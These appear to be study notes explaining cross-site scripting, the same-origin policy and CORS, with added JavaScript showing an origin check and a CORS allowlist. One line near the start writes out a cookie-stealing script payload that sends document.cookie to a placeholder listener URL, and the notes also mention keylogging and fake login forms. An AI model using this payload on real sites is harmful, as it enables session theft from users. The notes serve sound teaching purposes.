XSS is a code injection attack that allows an attacker to execute malicious code in another user's browser.
Possible leverage :
- Cookie Theft : Accessing the cookie using document.cookie and sending it to an attacker listener using something like
<script> window.location='http://url/?cookie=' + document.cookie </script>
- Keylogging : Registering a keylogger with addEventListener & sending the info to your own server
- Phishing : Showing a fake login form to steal credentials
XSS is largely used to circumvent the same origin policy, so it's relevant to talk about SOP.
Same origin policy :
Origin -> protocol + hostname (including subdomain) + port
Same origin policy dictates how a document/script loaded by one origin interacts with a resource from another origin.
It restricts page A from accessing data from page B, i.e. information embedded in page B's DOM, such as bank statements on a bank website.
SOP doesn't restrict loading cross-origin images, CSS, JS etc.
Same origin policy can be relaxed using some methods, one of which is CORS (cross origin resource sharing).
CORS : If the owners of https://bar.other wish to restrict data access to only requests from https://foo.example, they would send the allowed origin in a response header :
Access-Control-Allow-Origin: https://foo.example
So the data will only be served to requests from https://foo.example
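As an added example (not part of the original notes), the following JavaScript applies the origin rule above (protocol + hostname + port) and shows the allowlist check a server such as https://bar.other could use before emitting Access-Control-Allow-Origin. The function names and all URLs are constructed for illustration.

```javascript
// Added example, not from the original notes. All URLs are constructed samples.

// Reduce a URL to its origin. URL.origin serialises scheme://host[:port] and
// drops default ports, so https://foo.example:443 and https://foo.example are
// the same origin, while a different subdomain, scheme or port is not.
// Returns null for values that are not parseable URLs (e.g. an Origin header
// of the literal string "null" or garbage), so callers fail closed.
function originOf(urlString) {
  try {
    return new URL(urlString).origin;
  } catch {
    return null;
  }
}

function isSameOrigin(a, b) {
  const oa = originOf(a);
  return oa !== null && oa === originOf(b);
}

// CORS response headers for a request carrying `requestOrigin`. Only an
// origin on the allowlist is echoed back; anything else gets no
// Access-Control-Allow-Origin header at all, so the browser withholds the
// response from the requesting page. Reflecting the request's Origin
// unconditionally with credentials allowed would re-open the
// bankA.com / attacker.com scenario described in these notes.
function corsHeadersFor(requestOrigin, allowlist) {
  const allowed = allowlist.map(originOf).filter((o) => o !== null);
  const requested = originOf(requestOrigin);
  if (requested === null || !allowed.includes(requested)) {
    return {}; // not allowed: no CORS headers
  }
  return {
    'Access-Control-Allow-Origin': requested,
    'Access-Control-Allow-Credentials': 'true',
    // Vary on Origin so a shared cache never serves one origin's header to another.
    'Vary': 'Origin',
  };
}
```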
Before the same origin policy, if you logged into bankA.com from your device and then visited attacker.com, this malicious website could send a request to bankA.com; the browser would send the cookies with the request by default, so the request would be authenticated, and the malicious website could then parse the response and steal sensitive data.
But with the same origin policy, a website could no longer access data from a different origin.
Where XSS really shines is that the request is sent by a malicious script running within the security context of bankA.com, and the data is later sent to attacker.com. So XSS is really about exploiting any existing vulnerability that lets you inject malicious scripts into that context.